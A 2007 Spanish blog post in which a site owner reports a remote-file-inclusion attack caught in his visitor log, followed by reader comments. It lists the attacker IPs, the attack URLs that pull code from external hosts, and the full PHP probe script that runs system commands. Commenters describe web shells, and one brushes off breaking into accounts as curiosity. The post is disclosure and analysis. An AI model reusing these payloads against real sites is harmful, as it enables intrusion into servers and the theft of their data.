Me puse a ver las visitas online que había hace un ratito, y una de las particularidades de dicho script es que me dice que sección estan visitando en ese momento, como un log, para ver donde está cada uno en ese momento o que noticia se está viendo.
Muchas veces me encuentro con los spiders de Google o MSN inspeccionando el sitio, o con usuarios de este mismo blog, pero hoy me encontré con uno muy particular que decía algo así:
Anónimo 211.43.222.218 66 seg
http://www.fabio.com.ar/verpost.php?id_noticia=http://sabo.i-s-o.net/.
libwww-perl/5.65
¿libwww-perl? eso no es un browser, ¿pasar una url como variable? papito, eso todavía funciona pero fue cochino de tu parte 
Y si, me encontré con varios intentos de XSS (Cross-site Scripting), pero lo más interesante del caso es que proviene de múltiples IPs, es obvio que alguien está queriendo divertirse con este blog con unos lindos proxys de por medio para que no lo agarre y es muy probable, también, que lo esté haciendo con un bot que hace todo esto por él (lammer)
IPs:
211.43.222.218
194.210.29.33
62.67.246.252
84.234.115.2
200.94.196.146
87.229.14.10
Ataques:
http://www.fabio.com.ar/verpost.php?id_noticia=http://sabo.i-s-o.net/.
http://www.fabio.com.ar/index.php?tema=http://www.petcall.eu/nav?
URLs infectadas:
http://sabo.i-s-o.net/
http://www.petcall.eu/nav?
Script atacante:
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a
"; // md5('xeQt');
echo "Uname:$ker
";
echo "SySOs:$osx
";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
De algo sirvió el script para ver visitantes online, pude identificar un ataque en pleno momento no es que me de alegría, pero por lo menos sirve para ver por dónde te estan buscando.
Si te gustó esta nota podés...
24/09/2007 - 22:38:42
Seguramente sean bots spammers, o algo así. Capas bots que te auto defacean la web y te ponen muchos banners. Anda a saber jaja
25/09/2007 - 00:23:28
Me puse a ver las visitas online que había hace un ratito, y una de las particularidades de dicho
Hasta aca entendí
ahora bien.....
edit pata.bat
@echo off
dir *.* /p /w
cls
:D
Es todo lo que se... y ensima.. no funca mas
.. creo
25/09/2007 - 02:08:26
Que hijos de p&ta que son...que ganas de joder...
Legalmente en nuestro pais se puede hacer algo al respecto? Estaria bueno un post sobre eso.
Muy buena la pagina fabio ;) , todavia no pude hacer la fondue :(
Es Kirchner, que después de Jorge Asís, te viene a buscar a vos desde su sistema operativo del pingüinito....... :D
25/09/2007 - 04:50:12
¡¡¡¡ Pepe el Toro es inocente !!! ; ¡¡¡¡ Pepe el Toro es inocente !!! , ¡¡¡¡ Pepe el Toro es inocente !!!
Para mí, fue Julián... es que ¡le echó la culpa a nuestro presidente!
:D:D:D:D:D
Nah, mentira!
Fijate si no fueron los hackers a sueldo del Ministerio del Interior :rolleyes:
La otra vez hicieron lo mismo, pero con una pagina que hosteo.
Investigando, me puse a bajar el dichoso script que aparecia en los logs.
La verdad, cada vez se esmeran mas estos pibes.
Parecia una mini consola.
Tenias para crear, borrar, editar archivos y directorios, subir archivos por ftp, bajar por ftp a la maquina infectada, conectarte a la DB, browsear las tablas de la DB, ver procesos, MATAR procesos (claro, solo serian los tuyos o los de apache como mucho, que no es poco), ver la info de PHP, cambiar permisos, etc.
En fin, toda una navajita suiza en php.
Igual debe ser conocida, pero yo la vi por primera vez mirando ese archivo de log.
En fin, que gente esta....
|Lord_Zoo| dijo:
La otra vez hicieron lo mismo, pero con una pagina que hosteo.
Investigando, me puse a bajar el dichoso script que aparecia en los logs.
La verdad, cada vez se esmeran mas estos pibes.
Parecia una mini consola.
Tenias para crear, borrar, editar archivos y directorios, subir archivos por ftp, bajar por ftp a la maquina infectada, conectarte a la DB, browsear las tablas de la DB, ver procesos, MATAR procesos (claro, solo serian los tuyos o los de apache como mucho, que no es poco), ver la info de PHP, cambiar permisos, etc.
En fin, toda una navajita suiza en php.
Igual debe ser conocida, pero yo la vi por primera vez mirando ese archivo de log.
En fin, que gente esta....
25/09/2007 - 14:38:16
Hay una par de php shell.
Las pueden encontrar en varios lugares, pero creo que en milw0rm están la mayoría (en la parte de foro).
Hay scripts mas completos, que buscan en toda la página los POST y GET y algunos más y los va probando de a uno, pero ése no lo encontré "in the wild", era privado.
La verdad es que cada vez me rompe más las pelotas los servidores de hosteo, si no le prestás atención cada 10' a todas las vulnerabildiades que salen, te puden ownear hasta el servidor completo, y metete el IDS, el iptables y le bastión de seguridad física en el orto.
25/09/2007 - 20:39:05
Che...¿no querés explicar para la audiencia, y de forma que un niño de 5 años lo entienda que corchos descubriste?!?!?! :D :D :D
Digo, para no quedarnos colgados del pincel y sin la escalera! :lol:
25/09/2007 - 23:42:59
Echale la culpa a los rusos.
O a bin laden.
tiene onda echar la culpa a paises raros :D
asur owned :P dijo:
Che...¿no querés explicar para la audiencia, y de forma que un niño de 5 años lo entienda que corchos descubriste?!?!?! :D :D :D
Digo, para no quedarnos colgados del pincel y sin la escalera! :lol:
jajaj.. bueno.. los proto-hackers estan a la hora del día no?
Ahora una consulta, en el caso de que yo pruebe vulnerabilidades y boludeces como los PHP Shell Code en MIS webs, y tenga acceso a mysqls, ftps y publicshtmls de otros... que hago? aviso al isp? aviso al dueño del sitio? o posteo sobre la bosta que es el isp? (Dattatec)
04/12/2007 - 20:56:29
Estuve leyendo este blog un rato. No termino de entender el porqué de tanta indignación con respecto a la gente que quiere probar sus truquitos, ver cuán vulnerable es x sitio... me parece que todo el que se mete en alguna empresa en internet sabe que son las reglas del juego... Por otra parte, me sorprende también que la gente se indigne porque las personas quieran averiguar la contraseña de alguien... a mí no me gustaría que entren a mi correo, pero no tengo nada que esconder, no sé si me enojaria por ello pero sobre todo, entiendo esa curiosidad de leer lo que escribe otro cuando nadie lo mira! Sin llegar a niveles de enfermedad no? porque los post compulsivos en que pedían hackear contraseñas eran bastante enfermisos... Pero ahora son los mails, antes era el diario íntimo de una hermana, etc etc........... es un clásico.
